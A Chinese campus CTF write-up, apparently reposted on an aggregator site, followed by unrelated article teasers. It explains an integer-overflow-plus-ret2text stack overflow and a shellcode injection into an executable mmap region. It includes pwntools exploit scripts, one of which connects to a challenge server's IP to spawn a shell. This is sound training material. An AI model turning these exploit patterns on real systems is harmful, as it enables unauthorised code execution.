记录一次校园CTF--wp

一.第一题简单nc

这题直接nc 地址端口即可得到flags没有套路

二.第二题pwn:ezstack

这是一题栈溢出题目,查看保护:

没有开启PIE,运行下查看效果:

题目是一个文字购物游戏。

接着扔进IDA中分析:

在主函数中我们找到了一个类似隐藏的函数:

这个v6参数就是我们输入想要输入的选项,而Vipfun这一后门函数的参数v8就是我们的金币数,一开始我懵了好久。查看Vipfun这个函数:

通过分析看到当金币大于999999的时候,就会执行条件语句,在条件语句里,很明显的看出栈溢出漏洞。而且在IDA中发现了一个后门函数:

那么利用就简单了,我们只需要想办法让金币大于9999999就能造成栈溢出并成功构造一次ret2text,现在关键问题是如何让金币达到9999999呢,在题目游戏中选项3捡垃圾一次是10块钱,不得不说出题人很会玩。这捡垃圾捡到猴年马月去了。我们再看代码:

v4,v8都是无符号整形,那么如果我输入负数,就会造成整形溢出。我们在游戏中测试一下,v4其实是我们买饮料的数量:

我们可以看到,通过整形溢出我们成功让金币大于999999,此时执行1337将进入栈溢出函数

下面是exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
#sh = process('./ezstack')
#gdb.attach(sh,'start')

system_addr=0x400aa1
#sh_addr=
sh.recvuntil("天台")
sh.sendline("1")
sh.recvuntil(" (价格: 3元)")
sh.sendline("1")
sh.recvuntil("购买数量: ")
sh.sendline("-99999999")
sh.recvuntil("天台")
sh.sendline("1337")
sh.recvuntil("请输入工厂名字:")
#gdb.attach(sh)

#sh.send(p64(payload))
sh.sendline('A' * (0x20+8) + p64(system_addr))
#pause()
sh.interactive()

三.第三题 pwn:shell

查看保护:

64位程序没有开启PIE,IDA中东西也比较少,基本都是系统函数,主函数如下:

根据题目名字猜测,是要我们在某个地址执行shellcode。mmap这个函数的作用是将文件映射进内存。在第三个参数中,表示的是权限。可读可写可执行。1+2+4加起来刚好是7,这么说Mmap返回的地址是一块可读可写可执行的区域。那么我们直接输入shellcode就好了。在pwntool中已经集成了shellcode,我们直接调用即可,exp如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
context(os='linux',arch='amd64',terminal=['tmux','sp','-h'])
io = remote("121.40.144.254",10003)

shellcode1=shellcraft.sh()
payload1=asm(shellcode1)

io.send(payload1)
io.interactive()

四,是一个UAF堆,打本地的时候想岔了没做出来,晚点在复盘。

杂项:

1.做了一题很简单元神启动,题目中描述1+1等于几,我直接F12查看网页源代码得到出题人的1+1等于10,即可得到flags.

2.ezMD5

题目描述给了一个经过MD5转换和base64加密。用工具解密即可得到flags。

以上就是我大致做出来的wp。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/120690.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

macOS电池续航工具:Endurance中文

Endurance for Mac是一款强大而实用的电池管理和优化软件,专为MacBook设计。通过智能调整系统设置和管理后台应用,它能有效延长电池续航时间,提升工作和娱乐效率,成为你在各种场合下的得力助手。 Endurance for Mac软件的功能特色…

cordova Xcode打包ios以及发布流程(ionic3适用)

第一步 1、申请iOS证书 2、导入证书到钥匙串 第二步 1、xcode配置iOS证书 1.1用Xcode打开你的项目(我的Xcode版本是新版) 修改如下图 回到基本信息设置界面,Bundie 这项填写,最先创建的那个appid,跟创建iOS描述文件时选…

MySQL基础架构详解

概述 我们学习东西,都不应该是先去了解细节,而是应该窥其全貌,这样才能从高纬度去理解问题,同样我们学习mysql也是一样的,我们应该先了解整个mysql架构,及来龙去脉,才能更好的掌握它。下面我们开…

Mybatis-Plus使用Wrapper自定义SQL

文章目录 准备工作Mybatis-Plus使用Wrapper自定义SQL注意事项目录结构如下所示domain层Controller层Service层ServiceImplMapper层UserMapper.xml 结果如下所示:单表查询条件构造器单表查询,Mybatis-Plus使用Wrapper自定义SQL联表查询不用,My…

qt6:无法使用setFontColor

问题描述 跟着C开发指南视频学习,但是发现无论是直接使用ui设计,还是纯代码都无法实现变更字体颜色的功能。图中显示,点击颜色控件后,文本框的文字加粗、下划线、斜体等才能设置,但是无法变更颜色。 此文提醒qt sty…

基于驾驶训练算法的无人机航迹规划-附代码

基于驾驶训练算法的无人机航迹规划 文章目录 基于驾驶训练算法的无人机航迹规划1.驾驶训练搜索算法2.无人机飞行环境建模3.无人机航迹规划建模4.实验结果4.1地图创建4.2 航迹规划 5.参考文献6.Matlab代码 摘要:本文主要介绍利用驾驶训练算法来优化无人机航迹规划。 …

『MySQL快速上手』-③-库的操作

文章目录 1.创建数据库2.创建数据库案例3.字符集和校验规则3.2 校验规则对数据库的影响3.2.1 进行查询3.2.2 进行排序 4.字符集和检验规则的作用5.操纵数据库5.1 查看数据库5.2 显示创建语句5.3 修改数据库5.4 数据库删除 6.备份与恢复6.1 备份6.2 还原6.3 注意事项 7.查看数据…

[量化投资-学习笔记007]Python+TDengine从零开始搭建量化分析平台-布林带

布林带(Bollinger Bands)也称为布林通道、保力加通道,是由约翰布林格(John Bollinger)发明的技术分析指标。布林通道通常被用来确认资产价格波动范围。 布林通道是由三条平滑的曲线组成的趋势线图表,中线为…

js原型链

什么叫原型链 原型链是js中的核心,原型链将各个属性链接起来,在原型链上面定义,原型链上的其他属性能够使用,原型链就是保证继承 原型链区分 原型链分为显式原型和隐式原型 显式原型:只有函数和构建函数才有显式原型…

CCF CSP认证 历年题目自练Day44

题目一 试题编号: 201612-3 试题名称: 权限查询 时间限制: 1.0s 内存限制: 256.0MB 问题描述: 问题描述   授权 (authorization) 是各类业务系统不可缺少的组成部分,系统用户通过授权机制获得系统中各个…

[ACTF2020 新生赛]BackupFile 1

题目环境: 好好好,让找源文件是吧?咱们二话不说直接扫它后台 使用dirsearch工具扫描网站后台(博主有这个工具的压缩包,可以私聊我领取)python dirsearch.py -u http://0d418151-ebaf-4f26-86b2-5363ed16530…

01-基于IDEA,Spring官网,阿里云官网,手动四种方式创建SpringBoot工程

快速上手SpringBoot SpringBoot技术由Pivotal团队研发制作,功能的话简单概括就是加速Spring程序初始搭建过程和Spring程序的开发过程的开发 最基本的Spring程序至少有一个配置文件或配置类用来描述Spring的配置信息现在企业级开发使用Spring大部分情况下是做web开…

基于机器学习的 ICU 脑血管疾病死亡风险智能预测系统

温馨提示:文末有 CSDN 平台官方提供的学长 Wechat / QQ 名片 :) 1. 项目简介 重症患者或重大手术后的患者在重症监护室(ICU)内通过多种生命支持系统以维持生理功能。患者在ICU 内会被频繁持续的记录生命体征和实验室测量等多种数据。由于高频…

为什么有了MAC地址,还需要IP地址?

解释 搞懂这个问题,首先需要了解交换机的功能 交换机内部有一张MAC地址映射表,记录着MAC地址和端口的对应关系。 如果A要给B发送一个数据包,构造如下格式的数据结构: 到达交换机时,交换机内部通过自己维护的 MAC 地…

b2b.ccb.com:443 需要你的凭据

忙活了一天,晚上回来准备查一下公户的最近的账单。因为昨天晚上熬夜重新做了电脑系统,就下载了建设银行的E路护航,一切安装就绪,准备进入企业网银时,被这些垃圾搞的系统及软件恶心到了,在此记录一下&#x…

Flutter利用GridView创建网格布局实现优美布局

文章目录 简介使用详解导入依赖项创建一个基本的 GridView一些参数说明使用GridView.count来构造 其他控制总结 简介 GridView 是 Flutter 中用于创建网格布局的强大小部件。它允许你在行和列中排列子小部件,非常适合显示大量项目,例如图像、文本、卡片…

js树形数组遍历练习,扁平化、格式化、获取节点父级

1.树形数组扁平化 数组扁平化的方式很多,这里主要是用递归处理,除此之外还有正则、扩展运算符等等 const list [{name:1,id:1,children:[{name:11,id:11,children:[{name:111,id:111}]},{name:12},]},{name:2,id:2,children:[{name:21,id:21,children:…

数据结构-栈和队列(一)

目录 1.栈 1.1 栈的概念及结构 1.2 栈的实现 初始化栈: 入栈: 判空函数: 出栈: 获取栈顶元素: 获取栈中有效元素的个数: 销毁栈: 完整代码: 测试: 2. 队列 …

在 Python 中使用 Selenium 按文本查找元素

我们将通过示例介绍在Python中使用selenium通过文本查找元素的方法。 在 Python 中使用 Selenium 按文本查找元素 软件测试是检查应用程序是否满足用户需求的技术。 该技术有助于使应用程序成为无错误的应用程序。 软件测试可以手动完成,也可以通过某些软件完成。…

解决Docker启动之npm版本不兼容问题

报错内容: npm WARN read-shrinkwrap This version of npm is compatible with lockfileVersion1, but package-lock.json was generated for lockfileVersion2. Ill try to do my best with it! npm WARN tar ENOENT: no such file or directory, open /home/wvp-…